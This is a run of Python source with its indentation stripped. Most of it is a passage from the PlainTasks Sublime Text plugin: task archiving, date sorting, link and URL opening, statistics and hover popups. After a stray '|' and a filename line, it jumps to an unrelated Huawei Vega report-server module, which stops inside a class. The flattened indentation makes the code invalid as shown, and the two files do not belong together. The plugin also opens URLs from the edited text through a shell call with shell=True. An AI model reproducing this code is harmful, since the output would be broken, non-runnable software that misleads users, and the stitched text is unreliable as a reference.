# parentheses = check_parentheses(self.date_format, grps[4] or '')
# replacement = u'%s%s%s%s' % (grps[0], self.canc_tasks_bullet, grps[2], parentheses)
# self.view.replace(edit, line, replacement.rstrip())
# offset = -offset
elif 'cancelled' in current_scope:
grps = canc_matches.groups()
parentheses = check_parentheses(self.date_format, grps[4] or '')
replacement = u'%s%s%s%s' % (grps[0], self.open_tasks_bullet, grps[2], parentheses)
self.view.replace(edit, line, replacement.rstrip() + dblspc)
offset = -offset
self.view.sel().clear()
for ind, pt in enumerate(original):
ofs = ind * offset
new_pt = sublime.Region(pt.a + ofs, pt.b + ofs)
self.view.sel().add(new_pt)
PlainTasksStatsStatus.set_stats(self.view)
self.view.run_command('plain_tasks_toggle_highlight_past_due')
class PlainTasksArchiveCommand(PlainTasksBase):
def runCommand(self, edit, partial=False):
rds = 'meta.item.todo.completed'
rcs = 'meta.item.todo.cancelled'
# finding archive section
archive_pos = self.view.find(self.archive_name, 0, sublime.LITERAL)
if partial:
all_tasks = self.get_archivable_tasks_within_selections()
else:
all_tasks = self.get_all_archivable_tasks(archive_pos, rds, rcs)
if not all_tasks:
sublime.status_message('Nothing to archive')
else:
if archive_pos and archive_pos.a > 0:
line = self.view.full_line(archive_pos).end()
else:
create_archive = u'\n\n___________________\n%s\n' % self.archive_name
self.view.insert(edit, self.view.size(), create_archive)
line = self.view.size()
projects = get_all_projects_and_separators(self.view)
# adding tasks to archive section
for task in all_tasks:
line_content = self.view.substr(task)
match_task = re.match(r'^\s*(\[[x-]\]|.)(\s+.*$)', line_content, re.U)
current_scope = self.view.scope_name(task.a)
if rds in current_scope or rcs in current_scope:
pr = self.get_task_project(task, projects)
if self.project_postfix:
eol = u'{0}{1}{2}{3}\n'.format(
self.before_tasks_bullet_spaces,
line_content.strip(),
(u' @project(%s)' % pr) if pr else '',
' ' if line_content.endswith(' ') else '')
else:
eol = u'{0}{1}{2}{3}\n'.format(
self.before_tasks_bullet_spaces,
match_task.group(1), # bullet
(u'%s%s:' % (self.tasks_bullet_space, pr)) if pr else '',
match_task.group(2)) # very task
else:
eol = u'{0}{1}\n'.format(self.before_tasks_bullet_spaces * 2, line_content.lstrip())
line += self.view.insert(edit, line, eol)
            # remove moved tasks starting from the last one, otherwise earlier deletes would shift the later regions
for task in reversed(all_tasks):
self.view.erase(edit, self.view.full_line(task))
self.view.run_command('plain_tasks_sort_by_date')
def get_task_project(self, task, projects):
index = -1
for ind, pr in enumerate(projects):
if task < pr:
if ind > 0:
index = ind-1
break
        # if there are no projects before the task, return an empty string
if index == -1:
return ''
prog = re.compile(r'^\n*(\s*)(.+):(?=\s|$)\s*(\@[^\s]+(\(.*?\))?\s*)*')
hierarhProject = ''
if index >= 0:
depth = re.match(r"\s*", self.view.substr(self.view.line(task))).group()
while index >= 0:
strProject = self.view.substr(projects[index])
if prog.match(strProject):
spaces = prog.match(strProject).group(1)
if len(spaces) < len(depth):
hierarhProject = prog.match(strProject).group(2) + ((" / " + hierarhProject) if hierarhProject else '')
depth = spaces
if len(depth) == 0:
break
else:
sep = re.compile(r'(^\s*)---.{3,5}---+$')
spaces = sep.match(strProject).group(1)
if len(spaces) < len(depth):
depth = spaces
if len(depth) == 0:
break
index -= 1
if not hierarhProject:
return ''
else:
return hierarhProject
def get_task_note(self, task, tasks):
note_line = task.end() + 1
while self.view.scope_name(note_line) == 'text.todo notes.todo ':
note = self.view.line(note_line)
if note not in tasks:
tasks.append(note)
note_line = self.view.line(note_line).end() + 1
def get_all_archivable_tasks(self, archive_pos, rds, rcs):
done_tasks = [i for i in self.view.find_by_selector(rds) if i.a < (archive_pos.a if archive_pos and archive_pos.a > 0 else self.view.size())]
for i in done_tasks:
self.get_task_note(i, done_tasks)
canc_tasks = [i for i in self.view.find_by_selector(rcs) if i.a < (archive_pos.a if archive_pos and archive_pos.a > 0 else self.view.size())]
for i in canc_tasks:
self.get_task_note(i, canc_tasks)
all_tasks = done_tasks + canc_tasks
all_tasks.sort()
return all_tasks
def get_archivable_tasks_within_selections(self):
all_tasks = []
for region in self.view.sel():
for l in self.view.lines(region):
line = self.view.line(l)
if ('completed' in self.view.scope_name(line.a)) or ('cancelled' in self.view.scope_name(line.a)):
all_tasks.append(line)
self.get_task_note(line, all_tasks)
return all_tasks
class PlainTasksNewTaskDocCommand(sublime_plugin.WindowCommand):
def run(self):
view = self.window.new_file()
view.settings().add_on_change('color_scheme', lambda: self.set_proper_scheme(view))
view.set_syntax_file('Packages/PlainTasks/PlainTasks.sublime-syntax' if ST3 else
'Packages/PlainTasks/PlainTasks.tmLanguage')
def set_proper_scheme(self, view):
if view.id() != sublime.active_window().active_view().id():
return
pts = sublime.load_settings('PlainTasks.sublime-settings')
if view.settings().get('color_scheme') == pts.get('color_scheme'):
return
        # Since we cannot create a file with the syntax pre-set, there is a moment when the view
        # has no settings yet but is already activated, so some plugins (e.g. Color Highlighter) set a wrong color scheme
view.settings().set('color_scheme', pts.get('color_scheme'))
class PlainTasksOpenUrlCommand(sublime_plugin.TextCommand):
    # It is a horrible regex, but it works perfectly
URL_REGEX = r"""(?i)\b((?:https?://|www\d{0,3}[.]|[a-z0-9.\-]+[.][a-z]{2,4}/)(?:[^\s()<>]+|\(([^\s()<>]+|(\([^\s()<>]+\)))*\))
+(?:\(([^\s()<>]+|(\([^\s()<>]+\)))*\)|[^\s`!()\[\]{};:'".,<>?«»“”‘’]))"""
JIRA_REGEX = r'[^\s]+-\d+'
def run(self, edit):
s = self.view.sel()[0]
start, end = s.a, s.b
if 'url' in self.view.scope_name(start):
while self.view.substr(start) != '<': start -= 1
while self.view.substr(end) != '>': end += 1
rgn = sublime.Region(start + 1, end)
# optional select URL
self.view.sel().add(rgn)
url = self.view.substr(rgn)
if NT and all([ST3, ':' in url]):
# webbrowser uses os.startfile() under the hood, and it is not reliable in py3;
# thus call start command for url with scheme (eg skype:nick) and full path (eg c:\b)
subprocess.Popen(['start', url], shell=True)
else:
webbrowser.open_new_tab(url)
else:
if not self.search_bare_weblink_and_open(start, end):
self.search_bare_jira_and_open(start, end)
# sublime.status_message("Looks like there is nothing to open")
def search_bare_jira_and_open(self, start, end):
view_size = self.view.size()
stopSymbols = ['\t', ' ', '\"', '\'', '>', '<', ',']
# move the selection back to the start of the url
while (start > 0
and not self.view.substr(start - 1) in stopSymbols
and self.view.classify(start) & sublime.CLASS_LINE_START == 0):
start -= 1
# move end of selection forward to the end of the url
while (end < view_size
and not self.view.substr(end) in stopSymbols
and self.view.classify(end) & sublime.CLASS_LINE_END == 0):
end += 1
possible_ticket_code = self.view.substr(sublime.Region(start, end))
ticket_search = re.search(self.JIRA_REGEX, possible_ticket_code, re.X)
if ticket_search:
self._open_jira_in_browser(ticket_search.group(0))
return True
return False
def _open_jira_in_browser(self, ticket):
jira_domain = self.view.settings().get("jira_domain", None)
if not jira_domain:
return
url = "https://" + jira_domain + "/browse/" + ticket
webbrowser.open(url)
def search_bare_weblink_and_open(self, start, end):
# expand selection to nearest stopSymbols
view_size = self.view.size()
stopSymbols = ['\t', ' ', '\"', '\'', '>', '<', ',']
# move the selection back to the start of the url
while (start > 0
and not self.view.substr(start - 1) in stopSymbols
and self.view.classify(start) & sublime.CLASS_LINE_START == 0):
start -= 1
# move end of selection forward to the end of the url
while (end < view_size
and not self.view.substr(end) in stopSymbols
and self.view.classify(end) & sublime.CLASS_LINE_END == 0):
end += 1
# grab the URL
url = self.view.substr(sublime.Region(start, end))
# optional select URL
self.view.sel().add(sublime.Region(start, end))
exp = re.search(self.URL_REGEX, url, re.X)
if exp and exp.group(0):
strUrl = exp.group(0)
if strUrl.find("://") == -1:
strUrl = "http://" + strUrl
webbrowser.open_new_tab(strUrl)
return True
else:
return False
class PlainTasksOpenLinkCommand(sublime_plugin.TextCommand):
LINK_PATTERN = re.compile( # simple ./path/
r'''(?ixu)(?:^|[ \t])\.[\\/]
(?P<fn>
(?:[a-z]\:[\\/])? # special case for Windows full path
(?:[^\\/:">]+[\\/]?)+) # the very path (single filename/relative/full)
(?=[\\/:">]) # stop matching path
# options:
(>(?P<sym>\w+))?(\:(?P<line>\d+))?(\:(?P<col>\d+))?(\"(?P<text>[^\n]*)\")?
''')
MD_LINK = re.compile( # markdown [](path)
r'''(?ixu)\][ \t]*\(\<?(?:file\:///?)?
(?P<fn>.*?((\\\))?.*?)*)
(?:\>?[ \t]*
\"((\:(?P<line>\d+))?(\:(?P<col>\d+))?|(\>(?P<sym>\w+))?|(?P<text>[^\n]*))
\")?
\)
''')
WIKI_LINK = re.compile( # ORGMODE, NV, and all similar formats [[link][opt-desc]]
r'''(?ixu)\[\[(?:file(?:\+(?:sys|emacs))?\:)?(?:\.[\\/])?
(?P<fn>.*?((\\\])?.*?)*)
(?# options for orgmode link [[path::option]])
(?:\:\:(((?P<line>\d+))?(\:(?P<col>\d+))?|(\*(?P<sym>\w+))?|(?P<text>.*?((\\\])?.*?)*)))?
\](?:\[(.*?)\])?
\]
            (?# options for NV [[path]] "option" - NV does not support it, but PT should, so it won't break NV)
(?:[ \t]*
\"((\:(?P<linen>\d+))?(\:(?P<coln>\d+))?|(\>(?P<symn>\w+))?|(?P<textn>[^\n]*))
\")?
''')
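    # Link flavours these patterns are meant to match (illustrative examples):
    #   ./relative/path.txt:12          (LINK_PATTERN: simple ./path with optional :line:col, >symbol, "text")
    #   [description](path/to/file)     (MD_LINK)
    #   [[path::12]] or [[path][desc]]  (WIKI_LINK, orgmode-style options)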
def _format_res(self, res):
if res[3] == 'f':
return [res[0], "line: %d column: %d" % (int(res[1]), int(res[2]))]
elif res[3] == 'd':
return [res[0], 'Add folder to project' if ST3 else 'Folders are supported only in Sublime 3']
else:
return [res[0], res[1]]
def _on_panel_selection(self, selection, text=None, line=0):
if selection < 0:
self.panel_hidden = True
return
self.stop_thread = True
self.thread.join()
win = sublime.active_window()
win.run_command('hide_overlay')
res = self._current_res[selection]
if not res[3]:
return # user chose to stop search
if not ST3 and res[3] == "d":
return sublime.status_message('Folders are supported only in Sublime 3')
elif res[3] == "d":
data = win.project_data()
if not data:
data = {}
if "folders" not in data:
data["folders"] = []
data["folders"].append({'follow_symlinks': True,
'path': res[0]})
win.set_project_data(data)
else:
self.opened_file = win.open_file('%s:%s:%s' % res[:3],
sublime.ENCODED_POSITION)
if text:
sublime.set_timeout(lambda: self.find_text(self.opened_file, text, line), 300)
def search_files(self, all_folders, fn, sym, line, col, text):
'''run in separate thread; worker'''
fn = fn.replace('/', os.sep)
if os.path.isfile(fn): # check for full path
self._current_res.append((fn, line, col, "f"))
elif os.path.isdir(fn):
self._current_res.append((fn, 0, 0, "d"))
seen_folders = []
for folder in sorted(set(all_folders)):
for root, subdirs, _ in os.walk(folder):
if self.stop_thread:
return
if root in seen_folders:
continue
else:
seen_folders.append(root)
subdirs = [f for f in subdirs if os.path.join(root, f) not in seen_folders]
tname = '%s at %s' % (fn, root)
self.thread.name = tname if ST3 else tname.encode('utf8')
name = os.path.normpath(os.path.abspath(os.path.join(root, fn)))
if os.path.isfile(name):
item = (name, line, col, "f")
if item not in self._current_res:
self._current_res.append(item)
if os.path.isdir(name):
item = (name, 0, 0, "d")
if item not in self._current_res:
self._current_res.append(item)
self._current_res = self._current_res[1:] # remove 'Stop search' item
if not self._current_res:
return sublime.error_message('File was not found\n\n\t%s' % fn)
if len(self._current_res) == 1:
sublime.set_timeout(lambda: self._on_panel_selection(0), 1)
else:
entries = [self._format_res(res) for res in self._current_res]
sublime.set_timeout(lambda: self.window.show_quick_panel(entries, lambda i: self._on_panel_selection(i, text=text, line=line)), 1)
def run(self, edit):
if hasattr(self, 'thread'):
            if self.thread.is_alive():  # is_alive is a method; the bare attribute is always truthy
self.stop_thread = True
self.thread.join()
point = self.view.sel()[0].begin()
line = self.view.substr(self.view.line(point))
fn, sym, line, col, text = self.parse_link(line)
if not fn:
sublime.status_message('Line does not contain a valid link to file')
return
self.window = win = sublime.active_window()
self._current_res = [('Stop search', '', '', '')]
# init values to update quick panel
self.items = 0
self.panel_hidden = True
if sym:
for name, _, pos in win.lookup_symbol_in_index(sym):
if name.endswith(fn):
line, col = pos
self._current_res.append((name, line, col, "f"))
all_folders = win.folders() + [os.path.dirname(v.file_name()) for v in win.views() if v.file_name()]
self.stop_thread = False
self.thread = threading.Thread(target=self.search_files, args=(all_folders, fn, sym, line, col, text))
self.thread.setName('is starting')
self.thread.start()
self.progress_bar()
def find_text(self, view, text, line):
result = view.find(text, view.sel()[0].a if line else 0, sublime.LITERAL)
view.sel().clear()
view.sel().add(result.a)
view.set_viewport_position(view.text_to_layout(view.size()), False)
view.show_at_center(result)
def progress_bar(self, i=0, dir=1):
if not self.thread.is_alive():
PlainTasksStatsStatus.set_stats(self.view)
return
if self._current_res and sublime.active_window().active_view().id() == self.view.id():
items = len(self._current_res)
if items != self.items:
self.window.run_command('hide_overlay')
self.items = items
if self.panel_hidden:
entries = [self._format_res(res) for res in self._current_res]
self.window.show_quick_panel(entries, self._on_panel_selection)
self.panel_hidden = False
# This animates a little activity indicator in the status area
before = i % 8
after = (7) - before
if not after: dir = -1
if not before: dir = 1
i += dir
self.view.set_status('PlainTasks', u'Please wait%s…%ssearching %s' %
(' ' * before, ' ' * after, self.thread.name if ST3 else self.thread.name.decode('utf8')))
sublime.set_timeout(lambda: self.progress_bar(i, dir), 100)
return
def parse_link(self, line):
match_link = self.LINK_PATTERN.search(line)
match_md = self.MD_LINK.search(line)
match_wiki = self.WIKI_LINK.search(line)
if match_link:
fn, sym, line, col, text = match_link.group('fn', 'sym', 'line', 'col', 'text')
elif match_md:
fn, sym, line, col, text = match_md.group('fn', 'sym', 'line', 'col', 'text')
# unescape some chars
fn = (fn.replace('\\(', '(').replace('\\)', ')'))
elif match_wiki:
fn = match_wiki.group('fn')
sym = match_wiki.group('sym') or match_wiki.group('symn')
line = match_wiki.group('line') or match_wiki.group('linen')
col = match_wiki.group('col') or match_wiki.group('coln')
text = match_wiki.group('text') or match_wiki.group('textn')
# unescape some chars
fn = (fn.replace('\\[', '[').replace('\\]', ']'))
if text:
text = (text.replace('\\[', '[').replace('\\]', ']'))
return fn, sym, line or 0, col or 0, text
class PlainTasksSortByDate(PlainTasksBase):
def runCommand(self, edit):
do_split_archived = self.view.settings().get('split_archived_by_date', False)
archive_dividor = "\n---- ✄ -----------------------"
if not re.search(r'(?su)%[Yy][-./ ]*%m[-./ ]*%d\s*%H.*%M', self.date_format):
            # TODO: sort with dateutil so we won't depend on a specific date_format
return
archive_pos = self.view.find(self.archive_name, 0, sublime.LITERAL)
if archive_pos:
have_date = r'(^\s*[^\n]*?\s\@(?:done|cancelled)\s*(\([\d\w,\.:\-\/ ]*\))[^\n]*$)'
all_tasks_prefixed_date = []
all_tasks = self.view.find_all(have_date, 0, u"\\2\\1", all_tasks_prefixed_date)
all_dividors = self.view.find_all(archive_dividor) if do_split_archived else []
tasks_prefixed_date = []
tasks = []
divisors = []
for ind, task in enumerate(all_tasks):
if task.a > archive_pos.b:
tasks.append(task)
tasks_prefixed_date.append(all_tasks_prefixed_date[ind])
for dividor in all_dividors:
if dividor.a > archive_pos.b:
divisors.append(dividor)
notes = []
for ind, task in enumerate(tasks):
note_line = task.end() + 1
while self.view.scope_name(note_line) == 'text.todo notes.todo ':
note = self.view.line(note_line)
notes.append(note)
tasks_prefixed_date[ind] += u'\n' + self.view.substr(note)
note_line = note.end() + 1
to_remove = tasks+notes+divisors
to_remove.sort()
for i in reversed(to_remove):
self.view.erase(edit, self.view.full_line(i))
tasks_prefixed_date.sort(reverse=self.view.settings().get('new_on_top', True))
eol = archive_pos.end()
prev_date = None
for a in tasks_prefixed_date:
if do_split_archived:
date = a.split(")")[0].split(" ")[0].replace("(", "")
if prev_date is not None and prev_date != date:
eol += self.view.insert(edit, eol, archive_dividor)
prev_date = date
eol += self.view.insert(edit, eol, u'\n' + re.sub(r'^\([\d\w,\.:\-\/ ]*\)([^\b]*$)', u'\\1', a))
else:
sublime.status_message("Nothing to sort")
class PlainTasksRemoveBold(sublime_plugin.TextCommand):
def run(self, edit):
for s in reversed(list(self.view.sel())):
a, b = s.begin(), s.end()
for r in sublime.Region(b + 2, b), sublime.Region(a - 2, a):
self.view.erase(edit, r)
class PlainTasksStatsStatus(sublime_plugin.EventListener):
def on_activated(self, view):
if not view.score_selector(0, "text.todo") > 0:
return
self.set_stats(view)
def on_post_save(self, view):
self.on_activated(view)
@staticmethod
def set_stats(view):
view.set_status('PlainTasks', PlainTasksStatsStatus.get_stats(view))
@staticmethod
def get_stats(view):
msgf = view.settings().get('stats_format', '$n/$a done ($percent%) $progress Last task @done $last')
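        # with the default format this renders like (illustrative):
        #   '3/10 done (30%) ■■■□□□□□□□ Last task @done (16-05-05 11:33)'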
special_interest = re.findall(r'{{.*?}}', msgf)
for i in special_interest:
matches = view.find_all(i.strip('{}'))
pend, done, canc = [], [], []
for t in matches:
                # one task may contain the same tag/word several times; we count tasks, not tags
t = view.line(t).a
scope = view.scope_name(t)
if 'pending' in scope and t not in pend:
pend.append(t)
elif 'completed' in scope and t not in done:
done.append(t)
elif 'cancelled' in scope and t not in canc:
canc.append(t)
msgf = msgf.replace(i, '%d/%d/%d'%(len(pend), len(done), len(canc)))
ignore_archive = view.settings().get('stats_ignore_archive', False)
if ignore_archive:
archive_pos = view.find(view.settings().get('archive_name', 'Archive:'), 0, sublime.LITERAL)
pend = len([i for i in view.find_by_selector('meta.item.todo.pending') if i.a < (archive_pos.a if archive_pos and archive_pos.a > 0 else view.size())])
done = len([i for i in view.find_by_selector('meta.item.todo.completed') if i.a < (archive_pos.a if archive_pos and archive_pos.a > 0 else view.size())])
canc = len([i for i in view.find_by_selector('meta.item.todo.cancelled') if i.a < (archive_pos.a if archive_pos and archive_pos.a > 0 else view.size())])
else:
pend = len(view.find_by_selector('meta.item.todo.pending'))
done = len(view.find_by_selector('meta.item.todo.completed'))
canc = len(view.find_by_selector('meta.item.todo.cancelled'))
allt = pend + done + canc
percent = ((done+canc)/float(allt))*100 if allt else 0
factor = int(round(percent/10)) if percent<90 else int(percent/10)
barfull = view.settings().get('bar_full', u'■')
barempty = view.settings().get('bar_empty', u'□')
progress = '%s%s' % (barfull*factor, barempty*(10-factor)) if factor else ''
tasks_dates = []
view.find_all('(^\s*[^\n]*?\s\@(?:done)\s*(\([\d\w,\.:\-\/ ]*\))[^\n]*$)', 0, "\\2", tasks_dates)
date_format = view.settings().get('date_format', '(%y-%m-%d %H:%M)')
tasks_dates = [check_parentheses(date_format, t, is_date=True) for t in tasks_dates]
tasks_dates.sort(reverse=True)
last = tasks_dates[0] if tasks_dates else '(UNKNOWN)'
msg = (msgf.replace('$o', str(pend))
.replace('$d', str(done))
.replace('$c', str(canc))
.replace('$n', str(done+canc))
.replace('$a', str(allt))
.replace('$percent', str(int(percent)))
.replace('$progress', progress)
.replace('$last', last)
)
return msg
class PlainTasksCopyStats(sublime_plugin.TextCommand):
def is_enabled(self):
return self.view.score_selector(0, "text.todo") > 0
def run(self, edit):
msg = self.view.get_status('PlainTasks')
replacements = self.view.settings().get('replace_stats_chars', [])
if replacements:
for o, r in replacements:
msg = msg.replace(o, r)
sublime.set_clipboard(msg)
class PlainTasksArchiveOrgCommand(PlainTasksBase):
def runCommand(self, edit):
        # Archive the current subtree to our archive file, not just completed tasks.
# For now, it's mapped to ctrl-shift-o or super-shift-o
# TODO: Mark any tasks found as complete, or maybe warn.
# Get our archive filename
archive_filename = self.__createArchiveFilename()
# Figure out our subtree
region = self.__findCurrentSubtree()
if region.empty():
# How can we get here?
sublime.error_message("Error:\n\nCould not find a tree to archive.")
return
        # Write our region to our archive file
success = self.__writeArchive(archive_filename, region)
# only erase our region if the write was successful
if success:
self.view.erase(edit,region)
return
def __writeArchive(self, filename, region):
# Write out the given region
sublime.status_message(u'Archiving tree to {0}'.format(filename))
try:
# Have to use io.open because windows doesn't like writing
# utf8 to regular filehandles
with io.open(filename, 'a', encoding='utf8') as fh:
data = self.view.substr(region)
# Is there a way to read this in?
fh.write(u"--- ✄ -----------------------\n")
fh.write(u"Archived {0}:\n".format(tznow().strftime(
self.date_format)))
# And, finally, write our data
fh.write(u"{0}\n".format(data))
return True
except Exception as e:
sublime.error_message(u"Error:\n\nUnable to append to {0}\n{1}".format(
filename, str(e)))
return False
def __createArchiveFilename(self):
# Create our archive filename, from the mask in our settings.
        # Split filename into dir, base, and extension, then apply our mask
path_base, extension = os.path.splitext(self.view.file_name())
dir = os.path.dirname(path_base)
base = os.path.basename(path_base)
sep = os.sep
# Now build our new filename
try:
# This could fail, if someone messed up the mask in the
# settings. So, if it did fail, use our default.
archive_filename = self.archive_org_filemask.format(
dir=dir, base=base, ext=extension, sep=sep)
except:
# Use our default mask
archive_filename = self.archive_org_default_filemask.format(
dir=dir, base=base, ext=extension, sep=sep)
# Display error, letting the user know
sublime.error_message(u"Error:\n\nInvalid filemask:{0}\nUsing default: {1}".format(
self.archive_org_filemask, self.archive_org_default_filemask))
return archive_filename
def __findCurrentSubtree(self):
# Return the region that starts at the cursor, or starts at
# the beginning of the selection
line = self.view.line(self.view.sel()[0].begin())
# Start finding the region at the beginning of the next line
region = self.view.indented_region(line.b + 2)
if region.contains(line.b):
# there is no subtree
return sublime.Region(-1, -1)
if not region.empty():
region = sublime.Region(line.a, region.b)
return region
class PlainTasksFoldToTags(PlainTasksFold):
TAG = r'(?u)@\w+'
def run(self, edit):
tag_sels = [s for s in list(self.view.sel()) if 'tag.todo' in self.view.scope_name(s.a)]
if not tag_sels:
sublime.status_message('Cursor(s) must be placed on tag(s)')
return
tags = self.extract_tags(tag_sels)
tasks = [self.view.line(f) for f in self.view.find_all(r'[ \t](%s)' % '|'.join(tags)) if 'pending' in self.view.scope_name(f.a)]
if not tasks:
sublime.status_message('Pending tasks with given tags are not found')
print(tags, tag_sels)
return
self.exec_folding(self.add_projects_and_notes(tasks))
def extract_tags(self, tag_sels):
tags = []
for s in tag_sels:
start = end = s.a
limit = self.view.size()
while all(self.view.substr(start) != c for c in '@ \n'):
start -= 1
if start == 0:
break
while all(self.view.substr(end) != c for c in '( @\n'):
end += 1
if end == limit:
break
match = re.match(self.TAG, self.view.substr(sublime.Region(start, end)))
tag = match.group(0) if match else False
if tag and tag not in tags:
tags.append(tag)
return tags
class PlainTasksAddGutterIconsForTags(sublime_plugin.EventListener):
def on_activated(self, view):
if not view.score_selector(0, "text.todo") > 0:
return
view.erase_regions('critical')
view.erase_regions('high')
view.erase_regions('low')
view.erase_regions('today')
icon_critical = view.settings().get('icon_critical', '')
icon_high = view.settings().get('icon_high', '')
icon_low = view.settings().get('icon_low', '')
icon_today = view.settings().get('icon_today', '')
if not any((icon_critical, icon_high, icon_low, icon_today)):
return
critical = 'string.other.tag.todo.critical'
high = 'string.other.tag.todo.high'
low = 'string.other.tag.todo.low'
today = 'string.other.tag.todo.today'
r_critical = view.find_by_selector(critical)
r_high = view.find_by_selector(high)
r_low = view.find_by_selector(low)
r_today = view.find_by_selector(today)
if not any((r_critical, r_high, r_low, r_today)):
return
view.add_regions('critical', r_critical, critical, icon_critical, sublime.HIDDEN)
view.add_regions('high', r_high, high, icon_high, sublime.HIDDEN)
view.add_regions('low', r_low, low, icon_low, sublime.HIDDEN)
view.add_regions('today', r_today, today, icon_today, sublime.HIDDEN)
def on_post_save(self, view):
self.on_activated(view)
def on_load(self, view):
self.on_activated(view)
class PlainTasksHover(sublime_plugin.ViewEventListener):
'''Show popup with actions when hover over bullet'''
msg = ('<style>' # four curly braces because it will be modified with format method twice
'html {{{{background-color: color(var(--background) blenda(white 75%))}}}}'
'body {{{{margin: .1em .3em}}}}'
'p {{{{margin: .5em 0}}}}'
'a {{{{text-decoration: none}}}}'
'span.icon {{{{font-weight: bold; font-size: 1.3em}}}}'
'#icon-done {{{{color: var(--greenish)}}}}'
'#icon-cancel {{{{color: var(--redish)}}}}'
'#icon-archive {{{{color: var(--bluish)}}}}'
'#icon-outside {{{{color: var(--purplish)}}}}'
'#done {{{{color: var(--greenish)}}}}'
'#cancel {{{{color: var(--redish)}}}}'
'#archive {{{{color: var(--bluish)}}}}'
'#outside {{{{color: var(--purplish)}}}}'
'</style><body>'
'{actions}'
)
complete = '<a href="complete\v{point}"><span class="icon" id="icon-done">✔</span> <span id="done">Toggle complete</span></a>'
cancel = '<a href="cancel\v{point}"><span class="icon" id="icon-cancel">✘</span> <span id="cancel">Toggle cancel</span></a>'
archive = '<a href="archive\v{point}"><span class="icon" id="icon-archive">📚</span> <span id="archive">Archive</span></a>'
archivetofile = '<a href="tofile\v{point}"><span class="icon" id="icon-outside">📤</span> <span id="outside">Archive to file</span></a>'
actions = {
'text.todo meta.item.todo.pending': '<p>{complete}</p><p>{cancel}</p>'.format(complete=complete, cancel=cancel),
'text.todo meta.item.todo.completed': '<p>{archive}</p><p>{archivetofile}</p><p>{complete}</p>'.format(archive=archive, archivetofile=archivetofile, complete=complete),
'text.todo meta.item.todo.cancelled': '<p>{archive}</p><p>{archivetofile}</p><p>{complete}</p><p>{cancel}</p>'.format(archive=archive, archivetofile=archivetofile, complete=complete, cancel=cancel)
}
@classmethod
def is_applicable(cls, settings):
return settings.get('syntax') == 'Packages/PlainTasks/PlainTasks.sublime-syntax'
def on_hover(self, point, hover_zone):
self.view.hide_popup()
if hover_zone != sublime.HOVER_TEXT:
return
line = self.view.line(point)
line_scope_name = self.view.scope_name(line.a).strip()
if 'meta.item.todo' not in line_scope_name:
return
bullet = any(('bullet' in self.view.scope_name(p) for p in (point, point - 1)))
if not bullet:
return
width, height = self.view.viewport_extent()
self.view.show_popup(self.msg.format(actions=self.actions.get(line_scope_name)).format(point=point), 0, point or self.view.sel()[0].begin() or 1, width, height / 2, self.exec_action)
def exec_action(self, msg):
action, at = msg.split('\v')
case = {
'complete': lambda: self.view.run_command('plain_tasks_complete'),
'cancel': lambda: self.view.run_command('plain_tasks_cancel'),
'archive': lambda: self.view.run_command("plain_tasks_archive", {"partial": True}),
'tofile': lambda: self.view.run_command('plain_tasks_org_archive'),
}
self.view.sel().clear()
self.view.sel().add(sublime.Region(int(at)))
case[action]()
self.view.hide_popup()
class PlainTasksGotoTag(sublime_plugin.TextCommand):
def run(self, edit):
self.initial_viewport = self.view.viewport_position()
self.initial_sels = list(self.view.sel())
self.tags = sorted(
[r for r in self.view.find_by_selector('meta.tag.todo')
if not any(s in self.view.scope_name(r.a) for s in ('completed', 'cancelled'))
] +
self.view.find_by_selector('string.other.tag.todo.critical') +
self.view.find_by_selector('string.other.tag.todo.high') +
self.view.find_by_selector('string.other.tag.todo.low') +
self.view.find_by_selector('string.other.tag.todo.today')
)
window = self.view.window() or sublime.active_window()
items = [[self.view.substr(t), u'{0}: {1}'.format(self.view.rowcol(t.a)[0], self.view.substr(self.view.line(t)).strip())] for t in self.tags]
if ST3:
from bisect import bisect_left
# find the closest tag after current position of viewport, to avoid scrolling
closest_index = bisect_left([r.a for r in self.tags], self.view.layout_to_text(self.initial_viewport))
llen = len(self.tags)
selected_index = closest_index if closest_index < llen else llen - 1
window.show_quick_panel(items, self.on_done, 0, selected_index, self.on_highlighted)
else:
window.show_quick_panel(items, self.on_done)
def on_done(self, index):
if index < 0:
self.view.sel().clear()
self.view.sel().add_all(self.initial_sels)
self.view.set_viewport_position(self.initial_viewport)
return
self.view.sel().clear()
self.view.sel().add(sublime.Region(self.tags[index].a))
self.view.show_at_center(self.tags[index])
def on_highlighted(self, index):
self.view.sel().clear()
self.view.sel().add(self.tags[index])
self.view.show(self.tags[index], True)
|
report_server.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""Report."""
import json
import logging
import os
import glob
import pickle
import time
import random
from copy import deepcopy
import numpy as np
import pandas as pd
from threading import Lock
from collections import OrderedDict
from threading import Thread
import vega
from vega.common import FileOps, TaskOps
from vega.common.general import General
from .record import ReportRecord
from .report_persistence import ReportPersistence
from vega.common import MessageServer
from vega.common.utils import singleton
from vega.common.pareto_front import get_pareto_index
__all__ = ["ReportServer"]
logger = logging.getLogger(__name__)
_records_lock = Lock()
_modified = False
@singleton
class ReportServer(object):
"""Report server."""
def __init__(self):
self._hist_records = OrderedDict()
self.persistence = ReportPersistence()
self._start_save_report_thread()
def run(self):
"""Run report server."""
MessageServer().register_handler("update_record", update_record)
MessageServer().register_handler("get_record", get_record)
@property
def all_records(self):
"""Get all records."""
return deepcopy(list(self._hist_records.values()))
def print_best(self, step_name):
"""Print best performance and desc."""
records = self.get_pareto_front_records(step_name)
return [dict(worker_id=record.worker_id, performance=record._performance) for record in records]
def pareto_front(self, step_name=None, nums=None, records=None):
"""Get parent front. pareto."""
if records is None:
records = self.all_records
records = list(filter(lambda x: x.step_name == step_name and x.performance is not None, records))
records = [record for record in records if record.rewards_compeleted]
        if not records:
            return []
try:
rewards = [record.rewards if isinstance(record.rewards, list) else [record.rewards] for record in records]
indexes = get_pareto_index(np.array(rewards)).tolist()
return [record for i, record in enumerate(records) if indexes[i]]
except Exception as ex:
logging.error('No pareto_front_records found, ex=%s', ex)
return []
def get_step_records(self, step_name=None):
"""Get step records."""
if not step_name:
step_name = General.step_name
records = self.all_records
filter_steps = [step_name] if not isinstance(step_name, list) else step_name
records = list(filter(lambda x: x.step_name in filter_steps, records))
return records
def get_record(self, step_name, worker_id):
"""Get records by step name and worker id."""
records = self.all_records
records = list(filter(lambda x: x.step_name == step_name and x.worker_id == worker_id, records))
return records[0]
def get_last_record(self):
